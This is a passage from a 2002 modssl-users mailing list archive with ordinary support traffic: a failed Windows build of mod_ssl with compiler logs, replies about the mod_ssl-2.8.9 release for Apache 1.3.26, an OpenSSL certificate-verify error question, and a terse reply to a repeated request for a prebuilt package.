	id 17KVx0-0001if-00
	for ; Tue, 18 Jun 2002 23:16:06 -0400
Message-ID: <002801c2173f$9f6b19d0$0201a8c0@ptak>
From: "hunter" 
To: 
Subject: Compile fails while building mod_ssl - ?? bison - lex.ssl_expr_yy.c(1753)
Date: Tue, 18 Jun 2002 23:15:22 -0400
MIME-Version: 1.0
Content-Type: text/plain;
	charset="iso-8859-1"
Content-Transfer-Encoding: 7bit
X-Priority: 3
X-MSMail-Priority: Normal
X-Mailer: Microsoft Outlook Express 6.00.2600.0000
X-MimeOLE: Produced By Microsoft MimeOLE V6.00.2600.0000
Sender: owner-modssl-users@modssl.org
Precedence: bulk
Reply-To: modssl-users@modssl.org
X-Sender: "hunter" 
X-List-Manager: Majordomo [version 1.94.4]
X-List-Name: modssl-users

Could someone help me figure out why my compile fails...
This is the first time I have tried to compile with mod_ssl - that
is with openssl in srclib.

The code builds fine otherwise.

Compile errors...

echo    /nologo /MD /W3 /O2 /I "../../include" /I
"../../srclib/apr/include" /I "../../srclib/apr-util/include" /I
"../../srclib/openssl/inc32/openssl" /I "../../srclib/openssl/inc32"
/D "NDEBUG" /D "WIN32" /D "_WINDOWS" /D "WIN32_LEAN_AND_MEAN" /D
"NO_IDEA" /D "NO_RC5" /D "NO_MDC2" /Fo".\Release\\"
/Fd".\Release\mod_ssl" /FD /c "ssl_expr_scan.c"   >
I:\Temp\nm18BC.tmp
  cl.exe @I:\Temp\nm18BC.tmp
ssl_expr_scan.c
lex.ssl_expr_yy.c(1753) : error C2143: syntax error : missing ')'
before 'constant'
lex.ssl_expr_yy.c(1753) : error C2143: syntax error : missing '{'
before 'constant'
lex.ssl_expr_yy.c(1753) : error C2059: syntax error : ''
lex.ssl_expr_yy.c(1753) : error C2059: syntax error : ')'
lex.ssl_expr_yy.c(1756) : error C2449: found '{' at file scope
(missing function header?)
lex.ssl_expr_yy.c(1762) : error C2059: syntax error : '}'
lex.ssl_expr_yy.c(1774) : error C2449: found '{' at file scope
(missing function header?)
lex.ssl_expr_yy.c(1801) : error C2059: syntax error : '}'
lex.ssl_expr_yy.c(1867) : error C2449: found '{' at file scope
(missing function header?)
lex.ssl_expr_yy.c(1870) : error C2059: syntax error : '}'
lex.ssl_expr_yy.c(1915) : error C2449: found '{' at file scope
(missing function header?)
lex.ssl_expr_yy.c(1917) : error C2059: syntax error : '}'
lex.ssl_expr_yy.c(1926) : error C2449: found '{' at file scope
(missing function header?)
lex.ssl_expr_yy.c(1935) : error C2059: syntax error : '}'
lex.ssl_expr_yy.c(1943) : error C2449: found '{' at file scope
(missing function header?)
lex.ssl_expr_yy.c(1945) : error C2059: syntax error : '}'
  ".\Release\mod_ssl.so"  target does not exist
  echo   kernel32.lib user32.lib wsock32.lib ws2_32.lib advapi32.lib
gdi32.lib ssleay32.lib libeay32.lib /nologo /subsystem:
windows /dll /incremental:no /pdb:".\Release\mod_ssl.pdb"
/map:".\Release\mod_ssl.map" /machine:I386
/out:".\Release\mod_ssl.so" /
implib:".\Release\mod_ssl.lib"
/libpath:"../../srclib/openssl/out32dll"
/libpath:"../../srclib/openssl/out32" /base:@..\..\os\win3
2\BaseAddr.ref,mod_ssl ".\Release\mod_ssl.obj"
".\Release\ssl_engine_config.obj"  ".\Release\ssl_engine_dh.obj"
".\Release\ssl_e
ngine_init.obj"  ".\Release\ssl_engine_io.obj"
".\Release\ssl_engine_kernel.obj"  ".\Release\ssl_engine_log.obj"
".\Release\ssl_
engine_mutex.obj"  ".\Release\ssl_engine_pphrase.obj"
".\Release\ssl_engine_rand.obj"  ".\Release\ssl_engine_vars.obj"
".\Releas
e\ssl_expr.obj"  ".\Release\ssl_expr_eval.obj"
".\Release\ssl_expr_parse.obj"  ".\Release\ssl_expr_scan.obj"
".\Release\ssl_scac
he.obj"  ".\Release\ssl_scache_dbm.obj"
".\Release\ssl_scache_shmcb.obj"   > I:\Temp\nm18BD.tmp
 echo ".\Release\ssl_scache_shmht.obj"  ".\Release\ssl_util.obj"
".\Release\ssl_util_ssl.obj"  ".\Release\ssl_util_table.o
bj"  ".\Release\mod_ssl.res"  "..\..\srclib\apr\Release\libapr.lib"
"..\..\srclib\apr-util\Release\libaprutil.lib"  "..\..\Releas
e\libhttpd.lib" >> I:\Temp\nm18BD.tmp
        link.exe @I:\Temp\nm18BD.tmp
LINK : fatal error LNK1181: cannot open input file
'.\Release\ssl_expr_scan.obj'
        cd ..\..
        cd support
        nmake  -f abs.mak             CFG="abs - Win32 Release"
RECURSE=0 /build
      ".\Release"               Tue Jun 18 21:15:41 2002


The actual error varies ..
(before compiling with Visual Studio from the command line)

        cd ..\..
        cd modules\ssl
        nmake  -f mod_ssl.mak         CFG="mod_ssl - Win32 Release"
RECURSE=0  .\Release\mod_ssl.so

Microsoft (R) Program Maintenance Utility Version 7.00.9466
Copyright (C) Microsoft Corporation.  All rights reserved.

        if not exist ".\Release/" mkdir ".\Release"
        tempfile.bat
        tempfile.bat
        tempfile.bat
        tempfile.bat
        rc.exe /l 0x409 /fo".\Release\mod_ssl.res" /d "NDEBUG"
.\mod_ssl.rc
        cl.exe @I:\Temp\nm1A17.tmp
mod_ssl.c
ssl_engine_config.c
ssl_engine_dh.c
ssl_engine_init.c
ssl_engine_io.c
ssl_engine_kernel.c
ssl_engine_log.c
ssl_engine_mutex.c
ssl_engine_pphrase.c
ssl_engine_rand.c
ssl_engine_vars.c
ssl_expr.c
ssl_expr_eval.c
ssl_expr_parse.c
\cygnus\cygwin-b20\share\bison.simple(333) : warning C4013: 'alloca'
undefined; assuming extern returning int
ssl_expr_scan.c
lex.ssl_expr_yy.c(1753) : error C2143: syntax error : missing ')'
before 'constant'
lex.ssl_expr_yy.c(1753) : error C2143: syntax error : missing '{'
before 'constant'
lex.ssl_expr_yy.c(1753) : error C2059: syntax error : ''
lex.ssl_expr_yy.c(1753) : error C2059: syntax error : ')'
lex.ssl_expr_yy.c(1756) : error C2449: found '{' at file scope
(missing function header?)
lex.ssl_expr_yy.c(1762) : error C2059: syntax error : '}'
lex.ssl_expr_yy.c(1774) : error C2449: found '{' at file scope
(missing function header?)
lex.ssl_expr_yy.c(1801) : error C2059: syntax error : '}'
lex.ssl_expr_yy.c(1867) : error C2449: found '{' at file scope
(missing function header?)
lex.ssl_expr_yy.c(1870) : error C2059: syntax error : '}'
lex.ssl_expr_yy.c(1915) : error C2449: found '{' at file scope
(missing function header?)
lex.ssl_expr_yy.c(1917) : error C2059: syntax error : '}'
lex.ssl_expr_yy.c(1926) : error C2449: found '{' at file scope
(missing function header?)
lex.ssl_expr_yy.c(1935) : error C2059: syntax error : '}'
lex.ssl_expr_yy.c(1943) : error C2449: found '{' at file scope
(missing function header?)
lex.ssl_expr_yy.c(1945) : error C2059: syntax error : '}'
ssl_scache.c
ssl_scache_dbm.c
ssl_scache_shmcb.c
ssl_scache_shmht.c
ssl_util.c
Generating Code...
Compiling...
ssl_util_ssl.c
ssl_util_table.c
Generating Code...
NMAKE : fatal error U1077: 'cl.exe' : return code '0x2'
Stop.
NMAKE : fatal error U1077: 'G:\.NET\VC7\BIN\nmake.exe' : return code
'0x2'
Stop.
NMAKE : fatal error U1077: 'G:\.NET\VC7\BIN\nmake.exe' : return code
'0x2'
Stop.



Variation 3 .. second compile from command line...

        cd ..\..
        cd modules\ssl
        nmake  -f mod_ssl.mak         CFG="mod_ssl - Win32 Release"
RECURSE=0  .\Release\mod_ssl.so

Microsoft (R) Program Maintenance Utility Version 7.00.9466
Copyright (C) Microsoft Corporation.  All rights reserved.

        cl.exe @I:\Temp\nm1B2C.tmp
ssl_expr_scan.c
lex.ssl_expr_yy.c(1753) : error C2143: syntax error : missing ')'
before 'constant'
lex.ssl_expr_yy.c(1753) : error C2143: syntax error : missing '{'
before 'constant'
lex.ssl_expr_yy.c(1753) : error C2059: syntax error : ''
lex.ssl_expr_yy.c(1753) : error C2059: syntax error : ')'
lex.ssl_expr_yy.c(1756) : error C2449: found '{' at file scope
(missing function header?)
lex.ssl_expr_yy.c(1762) : error C2059: syntax error : '}'
lex.ssl_expr_yy.c(1774) : error C2449: found '{' at file scope
(missing function header?)
lex.ssl_expr_yy.c(1801) : error C2059: syntax error : '}'
lex.ssl_expr_yy.c(1867) : error C2449: found '{' at file scope
(missing function header?)
lex.ssl_expr_yy.c(1870) : error C2059: syntax error : '}'
lex.ssl_expr_yy.c(1915) : error C2449: found '{' at file scope
(missing function header?)
lex.ssl_expr_yy.c(1917) : error C2059: syntax error : '}'
lex.ssl_expr_yy.c(1926) : error C2449: found '{' at file scope
(missing function header?)
lex.ssl_expr_yy.c(1935) : error C2059: syntax error : '}'
lex.ssl_expr_yy.c(1943) : error C2449: found '{' at file scope
(missing function header?)
lex.ssl_expr_yy.c(1945) : error C2059: syntax error : '}'
NMAKE : fatal error U1077: 'cl.exe' : return code '0x2'
Stop.
NMAKE : fatal error U1077: 'G:\.NET\VC7\BIN\nmake.exe' : return code
'0x2'
Stop.
NMAKE : fatal error U1077: 'G:\.NET\VC7\BIN\nmake.exe' : return code
'0x2'
Stop.


bison, flex and awk are from cygwin (in the path)

openssl was built following openssl Win32 Instructions not Apache's
- perl configure VC-WIN32
- ms\do_masm
- nmake ms\ntdll.mak

Apache 2.0.36 built using Microsoft Visual Studio .NET (VC7)
- build from the IDE and then from the command line (my preference)
- similar failure with both

openssl is 'openssl-0.9.6d.tar.gz'



Thanks in advance...
Chris Lewis


______________________________________________________________________
Apache Interface to OpenSSL (mod_ssl)                   www.modssl.org
User Support Mailing List                      modssl-users@modssl.org
Automated List Manager                            majordomo@modssl.org

From owner-modssl-users@modssl.org  Thu Jun 20 19:42:22 2002
Received: by en5.engelschall.com (Sendmail 8.9.2) for modssl-users-L
	id TAA17478; Thu, 20 Jun 2002 19:41:20 +0200 (MET DST)
Received: by en5.engelschall.com (Sendmail 8.9.2) via ESMTP for 
	from exchange.wgen.net id TAA17408; Thu, 20 Jun 2002 19:40:45 +0200 (MET DST)
content-class: urn:content-classes:message
Subject: RE: modssl for apache 1.3.26
MIME-Version: 1.0
Content-Type: text/plain;
	charset="iso-8859-1"
Date: Thu, 20 Jun 2002 13:40:37 -0400
X-MimeOLE: Produced By Microsoft Exchange V6.0.5762.3
Message-ID: 
Thread-Topic: modssl for apache 1.3.26
Thread-Index: AcIYgTvHxZEsnMTaSoqdZOTTj0Z6BAAAD2iA
From: "Brian F. Vaughan" 
To: 
Content-Transfer-Encoding: 8bit
X-MIME-Autoconverted: from quoted-printable to 8bit by opensource.ee.ethz.ch id TAA17461
Sender: owner-modssl-users@modssl.org
Precedence: bulk
Reply-To: modssl-users@modssl.org
X-Sender: "Brian F. Vaughan" 
X-List-Manager: Majordomo [version 1.94.4]
X-List-Name: modssl-users

If you go to http://www.modssl.org there is a link to mod_ssl-2.8.9-1.3.26

Sincerely,

Brian Vaughan



-----Original Message-----
From: mjackson@axa.com.au [mailto:mjackson@axa.com.au]
Sent: Wednesday, June 19, 2002 1:38 AM
To: modssl-users@modssl.org
Subject: modssl for apache 1.3.26


Does anyone now when we can expect new modssl module for 1.3.26?  Need to
upgrade due to CA-2002-17.
Would 2.8.8-1.2.24 work??

Thanks,
Mark Jackson



*********************************************************************************
Important Note
This email (including any attachments) contains information which is 
confidential and may be subject to legal privilege.  If you are not 
the intended recipient you must not use, distribute or copy this 
email.  If you have received this email in error please notify the 
sender immediately and delete this email. Any views expressed in this 
email are not necessarily the views of AXA.   Thank you.
*********************************************************************************
______________________________________________________________________
Apache Interface to OpenSSL (mod_ssl)                   www.modssl.org
User Support Mailing List                      modssl-users@modssl.org
Automated List Manager                            majordomo@modssl.org
______________________________________________________________________
Apache Interface to OpenSSL (mod_ssl)                   www.modssl.org
User Support Mailing List                      modssl-users@modssl.org
Automated List Manager                            majordomo@modssl.org

From owner-modssl-users@modssl.org  Thu Jun 20 19:44:27 2002
Received: by en5.engelschall.com (Sendmail 8.9.2) for modssl-users-L
	id TAA17740; Thu, 20 Jun 2002 19:43:28 +0200 (MET DST)
Received: by en5.engelschall.com (Sendmail 8.9.2) via ESMTP for 
	from mail.inorth.com id TAA17701; Thu, 20 Jun 2002 19:42:55 +0200 (MET DST)
Received: by mail.inorth.com with Internet Mail Service (5.5.2653.19)
	id ; Thu, 20 Jun 2002 13:42:06 -0400
Message-ID: 
From: Henning Sittler 
To: "'modssl-users@modssl.org'" 
Subject: mod_ssl-2.8.9-1.3.26
Date: Thu, 20 Jun 2002 13:42:48 -0400
MIME-Version: 1.0
X-Mailer: Internet Mail Service (5.5.2653.19)
Content-Type: multipart/alternative;
	boundary="----_=_NextPart_001_01C21881.E4CB1F00"
Sender: owner-modssl-users@modssl.org
Precedence: bulk
Reply-To: modssl-users@modssl.org
X-Sender: Henning Sittler 
X-List-Manager: Majordomo [version 1.94.4]
X-List-Name: modssl-users

This message is in MIME format. Since your mail reader does not understand
this format, some or all of this message may not be legible.

------_=_NextPart_001_01C21881.E4CB1F00
Content-Type: text/plain;
	charset="iso-8859-1"

mod_ssl-2.8.9-1.3.26 is available for download on modssl.org

This should be what most people are looking for in regards to Apache 1.3.26
!!


Henning Sittler
www.inscriber.com

------_=_NextPart_001_01C21881.E4CB1F00
Content-Type: text/html;
	charset="iso-8859-1"






mod_ssl-2.8.9-1.3.26




mod_ssl-2.8.9-1.3.26 is available for download on modssl.org




This should be what most people are looking for in regards to Apache 1.3.26 !!






Henning Sittler

www.inscriber.com





------_=_NextPart_001_01C21881.E4CB1F00--
______________________________________________________________________
Apache Interface to OpenSSL (mod_ssl)                   www.modssl.org
User Support Mailing List                      modssl-users@modssl.org
Automated List Manager                            majordomo@modssl.org

From owner-modssl-users@modssl.org  Thu Jun 20 19:50:08 2002
Received: by en5.engelschall.com (Sendmail 8.9.2) for modssl-users-L
	id TAA18340; Thu, 20 Jun 2002 19:49:20 +0200 (MET DST)
Received: by en5.engelschall.com (Sendmail 8.9.2) via ESMTP for 
	from hotmail.com id TAA18292; Thu, 20 Jun 2002 19:48:44 +0200 (MET DST)
Received: from mail pickup service by hotmail.com with Microsoft SMTPSVC;
	 Thu, 20 Jun 2002 10:48:38 -0700
Received: from 204.115.33.236 by lw7fd.law7.hotmail.msn.com with HTTP;
	Thu, 20 Jun 2002 17:48:38 GMT
X-Originating-IP: [204.115.33.236]
From: "Jim Lee" 
To: modssl-users@modssl.org
Subject: RE: Apache 1.3.26 Upgrade Question
Date: Thu, 20 Jun 2002 17:48:38 +0000
Mime-Version: 1.0
Content-Type: text/plain; format=flowed
Message-ID: 
X-OriginalArrivalTime: 20 Jun 2002 17:48:38.0419 (UTC) FILETIME=[B52C4E30:01C21882]
Sender: owner-modssl-users@modssl.org
Precedence: bulk
Reply-To: modssl-users@modssl.org
X-Sender: "Jim Lee" 
X-List-Manager: Majordomo [version 1.94.4]
X-List-Name: modssl-users


Hi,

Please forgive my ignorance.

I wish to create a file similar to the following one:
Apache_1.3.20-Mod_SSL_2.8.4-OpenSSL_0.9.6a-WIN32.zip,

namely,
Apache_1.3.26-Mod_SSL_2.8.9-OpenSSL_0.9.6c-WIN32.zip,

I need this file so that i can upgrade my current Apache 1.3.20 server with 
mod_ssl to Apache 1.3.26 server with mod_ssl.

I do not have a VC++ 5.0 compiler on my desk and have no idea how i could 
get the above file from the apache_1.3.26.tar.gz and the 
mod_ssl-2.8.9-1.3.26.tar.gz and the openssl-0.9.6c.tar.gz files.

Any help from my friends would be highly appreciated.

Thanks.

Bye,
-Jim.



From: "Gilles Gros" 

What is really your question ?

Just download the source and compile it.

apache 1.3.26 : http://www.apache.org/dist/httpd/apache_1.3.26.tar.gz
mod SSL 2.8.9-1.3.26 :
http://www.modssl.org/source/mod_ssl-2.8.9-1.3.26.tar.gz

Gilles

Hi,

Could somebody help me create the Apache_1.3.26-Mod_SSL_x-OpenSSL_x file
from the mod_ssl-2.8.9-1.3.26.tar.gz file that has been released recently.

Thanks.

Bye,
-Jim.


On Wed, 19 Jun 2002, Jim Lee wrote:

We have been unable to find the above Apache_1.3.26-Mod_SSL_x file in the 
http://www.modssl.org/contrib/ area.

Nobody's contributed one yet.  I imagine it won't be that far off, it
usually doesn't take too long.

We also wish to know if the SSL certificate has to be re-created after
Apache is upgraded to 1.3.26 with the new mod_SSL.

No.

--Cliff


_________________________________________________________________
Send and receive Hotmail on your mobile device: http://mobile.msn.com

______________________________________________________________________
Apache Interface to OpenSSL (mod_ssl)                   www.modssl.org
User Support Mailing List                      modssl-users@modssl.org
Automated List Manager                            majordomo@modssl.org

From owner-modssl-users@modssl.org  Thu Jun 20 19:50:10 2002
Received: by en5.engelschall.com (Sendmail 8.9.2) for modssl-users-L
	id TAA18344; Thu, 20 Jun 2002 19:49:28 +0200 (MET DST)
Received: by en5.engelschall.com (Sendmail 8.9.2) via ESMTP for 
	from vulcan.bascom.com id TAA18291; Thu, 20 Jun 2002 19:48:40 +0200 (MET DST)
Received: (from root@localhost)
	by vulcan.bascom.com (8.11.3/8.11.3/SuSE Linux 8.11.1-0.5) id g5KHmdM07878
	for modssl-users@modssl.org; Thu, 20 Jun 2002 13:48:39 -0400
Received: from dcomont (sandstorm-red.bascom.com [206.112.62.241])
	by vulcan.bascom.com (8.11.3/8.11.3/SuSE Linux 8.11.1-0.5) with SMTP id g5KHmal07824
	for ; Thu, 20 Jun 2002 13:48:36 -0400
From: "Drew J. Como" 
To: 
Subject: RE: problem build apache_1.3.26 with modssl
Date: Thu, 20 Jun 2002 13:51:12 -0400
Message-ID: <001201c21883$11dc0710$13013c0a@dcomo>
MIME-Version: 1.0
X-scanner: scanned by Inflex 1.0.12.2 - (http://pldaniels.com/inflex/)
Content-Type: text/plain;
	charset="iso-8859-1"
Content-Transfer-Encoding: 7bit
X-Priority: 3 (Normal)
X-MSMail-Priority: Normal
X-Mailer: Microsoft Outlook CWS, Build 9.0.2416 (9.0.2911.0)
In-Reply-To: 
X-MimeOLE: Produced By Microsoft MimeOLE V6.00.2600.0000
Importance: Normal
Sender: owner-modssl-users@modssl.org
Precedence: bulk
Reply-To: modssl-users@modssl.org
X-Sender: "Drew J. Como" 
X-List-Manager: Majordomo [version 1.94.4]
X-List-Name: modssl-users

Actually, you can, but your using the wrong version of mod_ssl.
You will need to use mod_ssl-2.8.9-1.3.26.

Hope this helps!!

============================================
Drew J. Como             Phone: 631-434-6600
Systems Administrator      Fax: 631-434-7800
dcomo@bascom.com         Web: www.bascom.com
    Bascom Global Internet Services, Inc.
--------------------------------------------
          "When quality is the goal,
           winning is guaranteed."


-----Original Message-----
From: owner-modssl-users@modssl.org
[mailto:owner-modssl-users@modssl.org]On Behalf Of J S
Sent: Wednesday, June 19, 2002 4:57 AM
To: modssl-users@modssl.org
Subject: problem build apache_1.3.26 with modssl


How do I compile mod_ssl-2.8.8-1.3.24 with apache_1.3.26? When I run
configure --with-apache=../apache_1.3.26 I get the foolowing error:


Configuring mod_ssl/2.8.8 for Apache/1.3.24
./configure:Error: The mod_ssl/2.8.8 can be used for Apache/1.3.24 only.
./configure:Error: Your Apache source tree under ../apache_1.3.26 is version
1.3.26.
./configure:Hint:  Please use an extracted apache_1.3.24.tar.gz tarball
./configure:Hint:  with the --with-apache option, only.

Does this mean I can't build apache_1.3.26 with mod-ssl compiled in?

JS.


_________________________________________________________________
Send and receive Hotmail on your mobile device: http://mobile.msn.com
______________________________________________________________________
Apache Interface to OpenSSL (mod_ssl)                   www.modssl.org
User Support Mailing List                      modssl-users@modssl.org
Automated List Manager                            majordomo@modssl.org

______________________________________________________________________
Apache Interface to OpenSSL (mod_ssl)                   www.modssl.org
User Support Mailing List                      modssl-users@modssl.org
Automated List Manager                            majordomo@modssl.org

From owner-modssl-users@modssl.org  Thu Jun 20 19:55:29 2002
Received: by en5.engelschall.com (Sendmail 8.9.2) for modssl-users-L
	id TAA18733; Thu, 20 Jun 2002 19:54:17 +0200 (MET DST)
Received: by en5.engelschall.com (Sendmail 8.9.2) via ESMTP for 
	from iaweb02.ifmc.org id TAA18713; Thu, 20 Jun 2002 19:54:03 +0200 (MET DST)
Received: from GW5DOM2-MTA by iaweb02.ifmc.org
	with Novell_GroupWise; Thu, 20 Jun 2002 12:53:56 -0500
Message-Id: 
X-Mailer: Novell GroupWise Internet Agent 6.0.1
Date: Thu, 20 Jun 2002 12:53:26 -0500
From: "Mary Peterson" 
To: 
Subject: SSL3_GET_CERT_VERIFY:wrong signature size
Mime-Version: 1.0
Content-Type: text/plain; charset=US-ASCII
Content-Transfer-Encoding: 7bit
Content-Disposition: inline
Sender: owner-modssl-users@modssl.org
Precedence: bulk
Reply-To: modssl-users@modssl.org
X-Sender: "Mary Peterson" 
X-List-Manager: Majordomo [version 1.94.4]
X-List-Name: modssl-users

I am getting the following error in my apache error log when a user is
using their certificate's private key to digitally sign a registration
form on our website.  Does anyone know how to fix this so the error
message doesn't appear?  The signing algorithm is sha1RSA.

[error] mod_ssl: SSL handshake failed (server www.test..org, client
xx.xx.xx.xx) (OpenSSL library error follows)
[error] OpenSSL: error:14088109:SSL routines:SSL3_GET_CERT_VERIFY:wrong
signature size

I would appreciate any assistance that anyone could give.  Thanks!
______________________________________________________________________
Apache Interface to OpenSSL (mod_ssl)                   www.modssl.org
User Support Mailing List                      modssl-users@modssl.org
Automated List Manager                            majordomo@modssl.org

From owner-modssl-users@modssl.org  Thu Jun 20 19:56:18 2002
Received: by en5.engelschall.com (Sendmail 8.9.2) for modssl-users-L
	id TAA18797; Thu, 20 Jun 2002 19:55:28 +0200 (MET DST)
Received: by en5.engelschall.com (Sendmail 8.9.2) via ESMTP for 
	from iaweb02.ifmc.org id TAA18767; Thu, 20 Jun 2002 19:55:04 +0200 (MET DST)
Received: from GW5DOM2-MTA by iaweb02.ifmc.org
	with Novell_GroupWise; Thu, 20 Jun 2002 11:53:53 -0500
Message-Id: 
X-Mailer: Novell GroupWise Internet Agent 6.0.1
Date: Thu, 20 Jun 2002 11:53:50 -0500
From: "Mary Peterson" 
To: 
Subject: SSL3_GET_CERT_VERIFY:wrong signature size
Mime-Version: 1.0
Content-Type: text/plain; charset=US-ASCII
Content-Transfer-Encoding: 7bit
Content-Disposition: inline
Sender: owner-modssl-users@modssl.org
Precedence: bulk
Reply-To: modssl-users@modssl.org
X-Sender: "Mary Peterson" 
X-List-Manager: Majordomo [version 1.94.4]
X-List-Name: modssl-users

I am getting the following error in my apache error log when a user is
using their certificate's private key to digitally sign a registration
form on our website.  Does anyone know how to fix this so the error
message doesn't appear?  The signing algorithm is sha1RSA.

[error] mod_ssl: SSL handshake failed (server www.test..org, client
xx.xx.xx.xx) (OpenSSL library error follows)
[error] OpenSSL: error:14088109:SSL routines:SSL3_GET_CERT_VERIFY:wrong
signature size

I would appreciate any assistance that anyone could give.  Thanks!
______________________________________________________________________
Apache Interface to OpenSSL (mod_ssl)                   www.modssl.org
User Support Mailing List                      modssl-users@modssl.org
Automated List Manager                            majordomo@modssl.org

From owner-modssl-users@modssl.org  Thu Jun 20 20:08:05 2002
Received: by en5.engelschall.com (Sendmail 8.9.2) for modssl-users-L
	id UAA19613; Thu, 20 Jun 2002 20:07:30 +0200 (MET DST)
Received: by en5.engelschall.com (Sendmail 8.9.2) via ESMTP for 
	from mail.inorth.com id UAA19557; Thu, 20 Jun 2002 20:06:27 +0200 (MET DST)
Received: by mail.inorth.com with Internet Mail Service (5.5.2653.19)
	id ; Thu, 20 Jun 2002 14:05:40 -0400
Message-ID: 
From: Henning Sittler 
To: "'modssl-users@modssl.org'" 
Subject: RE: Apache 1.3.26 Upgrade Question
Date: Thu, 20 Jun 2002 14:06:23 -0400
MIME-Version: 1.0
X-Mailer: Internet Mail Service (5.5.2653.19)
Content-Type: multipart/alternative;
	boundary="----_=_NextPart_001_01C21885.300D2500"
Sender: owner-modssl-users@modssl.org
Precedence: bulk
Reply-To: modssl-users@modssl.org
X-Sender: Henning Sittler 
X-List-Manager: Majordomo [version 1.94.4]
X-List-Name: modssl-users

This message is in MIME format. Since your mail reader does not understand
this format, some or all of this message may not be legible.

------_=_NextPart_001_01C21885.300D2500
Content-Type: text/plain;
	charset="iso-8859-1"

Well, your tone is getting a little better so... 

The first thing I would do is to go check the site where you originally
found the first file, and see if they have the new file.  If they don't I
would then look on that site to see if there is a way to contact the people
that make that file, and ask them very very nicely if they would be able to
make this one for you too.

OR

Change the way you do your installs.  

OR 

Hire a professional that knows how to handle these problems.

** But, please stop asking the same question over and over again.  


Henning Sittler
www.inscriber.com



-----Original Message-----
From: Jim Lee [mailto:jimlee2@hotmail.com]
Sent: Thursday, June 20, 2002 1:49 PM
To: modssl-users@modssl.org
Subject: RE: Apache 1.3.26 Upgrade Question



Hi,

Please forgive my ignorance.

I wish to create a file similar to the following one:
Apache_1.3.20-Mod_SSL_2.8.4-OpenSSL_0.9.6a-WIN32.zip,

namely,
Apache_1.3.26-Mod_SSL_2.8.9-OpenSSL_0.9.6c-WIN32.zip,

I need this file so that i can upgrade my current Apache 1.3.20 server with 
mod_ssl to Apache 1.3.26 server with mod_ssl.

I do not have a VC++ 5.0 compiler on my desk and have no idea how i could 
get the above file from the apache_1.3.26.tar.gz and the 
mod_ssl-2.8.9-1.3.26.tar.gz and the openssl-0.9.6c.tar.gz files.

Any help from my friends would be highly appreciated.

Thanks.

Bye,
-Jim.



From: "Gilles Gros" 

What is really your question ?

Just download the source and compile it.

apache 1.3.26 : http://www.apache.org/dist/httpd/apache_1.3.26.tar.gz
mod SSL 2.8.9-1.3.26 :
http://www.modssl.org/source/mod_ssl-2.8.9-1.3.26.tar.gz

Gilles

Hi,

Could somebody help me create the Apache_1.3.26-Mod_SSL_x-OpenSSL_x file
from the mod_ssl-2.8.9-1.3.26.tar.gz file that has been released recently.

Thanks.

Bye,
-Jim.


On Wed, 19 Jun 2002, Jim Lee wrote:

We have been unable to find the above Apache_1.3.26-Mod_SSL_x file in the 
http://www.modssl.org/contrib/ area.

Nobody's contributed one yet.  I imagine it won't be that far off, it
usually doesn't take too long.

We also wish to know if the SSL certificate has to be re-created after
Apache is upgraded to 1.3.26 with the new mod_SSL.

No.

--Cliff


_________________________________________________________________
Send and receive Hotmail on your mobile device: http://mobile.msn.com

______________________________________________________________________
Apache Interface to OpenSSL (mod_ssl)                   www.modssl.org
User Support Mailing List                      modssl-users@modssl.org
Automated List Manager                            majordomo@modssl.org

------_=_NextPart_001_01C21885.300D2500
Content-Type: text/html;
	charset="iso-8859-1"
Content-Transfer-Encoding: quoted-printable






RE: Apache 1.3.26 Upgrade Question




Well, your tone is getting a little better so... =





The first thing I would do is to go check the site =
where you originally found the first file, and see if they have the new =
file.  If they don't I would then look on that site to see if =
there is a way to contact the people that make that file, and ask them =
very very nicely if they would be able to make this one for you =
too.



OR




Change the way you do your installs.  




OR 




Hire a professional that knows how to handle these =
problems.




** But, please stop asking the same question over and =
over again.  






Henning Sittler

www.inscriber.com








-----Original Message-----

From: Jim Lee [mailto:jimlee2@hotmail.com]

Sent: Thursday, June 20, 2002 1:49 PM

To: modssl-users@modssl.org

Subject: RE: Apache 1.3.26 Upgrade Question








Hi,




Please forgive my ignorance.




I wish to create a file similar to the following =
one:

Apache_1.3.20-Mod_SSL_2.8.4-OpenSSL_0.9.6a-WIN32.zip,




namely,

Apache_1.3.26-Mod_SSL_2.8.9-OpenSSL_0.9.6c-WIN32.zip,




I need this file so that i can upgrade my current =
Apache 1.3.20 server with 

mod_ssl to Apache 1.3.26 server with mod_ssl.




I do not have a VC++ 5.0 compiler on my desk and have =
no idea how i could 

get the above file from the apache_1.3.26.tar.gz and =
the 

mod_ssl-2.8.9-1.3.26.tar.gz and the =
openssl-0.9.6c.tar.gz files.




Any help from my friends would be highly =
appreciated.




Thanks.




Bye,

-Jim.








From: "Gilles Gros" =
<gillesg@whitepj.com>




What is really your question ?




Just download the source and compile it.




apache 1.3.26 : http://www.apache.org/dist/httpd/apache_1.3.26.tar.gz<=
/A>

mod SSL 2.8.9-1.3.26 :

http://www.modssl.org/source/mod_ssl-2.8.9-1.3.26.tar.=
gz




Gilles




Hi,




Could somebody help me create the =
Apache_1.3.26-Mod_SSL_x-OpenSSL_x file

from the mod_ssl-2.8.9-1.3.26.tar.gz file that has =
been released recently.




Thanks.




Bye,

-Jim.






On Wed, 19 Jun 2002, Jim Lee wrote:




We have been unable to find the above =
Apache_1.3.26-Mod_SSL_x file in the 

http://www.modssl.org/contrib/ area.




Nobody's contributed one yet.  I imagine it =
won't be that far off, it

usually doesn't take too long.




We also wish to know if the SSL certificate has to be =
re-created after

Apache is upgraded to 1.3.26 with the new =
mod_SSL.




No.




--Cliff






_______________________________________________________________=
__

Send and receive Hotmail on your mobile device: http://mobile.msn.com




_______________________________________________________________=
_______

Apache Interface to OpenSSL =
(mod_ssl)          &nb=
sp;        www.modssl.org

User Support Mailing =
List           &n=
bsp;          =
modssl-users@modssl.org

Automated List =
Manager           =
;            =
;     majordomo@modssl.org





------_=_NextPart_001_01C21885.300D2500--
______________________________________________________________________
Apache Interface to OpenSSL (mod_ssl)                   www.modssl.org
User Support Mailing List                      modssl-users@modssl.org
Automated List Manager                            majordomo@modssl.org

From owner-modssl-users@modssl.org  Thu Jun 20 20:16:07 2002
Received: by en5.engelschall.com (Sendmail 8.9.2) for modssl-users-L
	id UAA20461; Thu, 20 Jun 2002 20:15:30 +0200 (MET DST)
Received: by en5.engelschall.com (Sendmail 8.9.2) via ESMTP for 
	from soulshock.mail.pas.earthlink.net id UAA20451; Thu, 20 Jun 2002 20:15:05 +0200 (MET DST)
Received: from goose.mail.pas.earthlink.net (goose.mail.pas.earthlink.net [207.217.120.18])
	by soulshock.mail.pas.earthlink.net (8.11.6+Sun/8.11.6) with ESMTP id g5KG1JZ01350
	for ; Thu, 20 Jun 2002 09:01:19 -0700 (PDT)
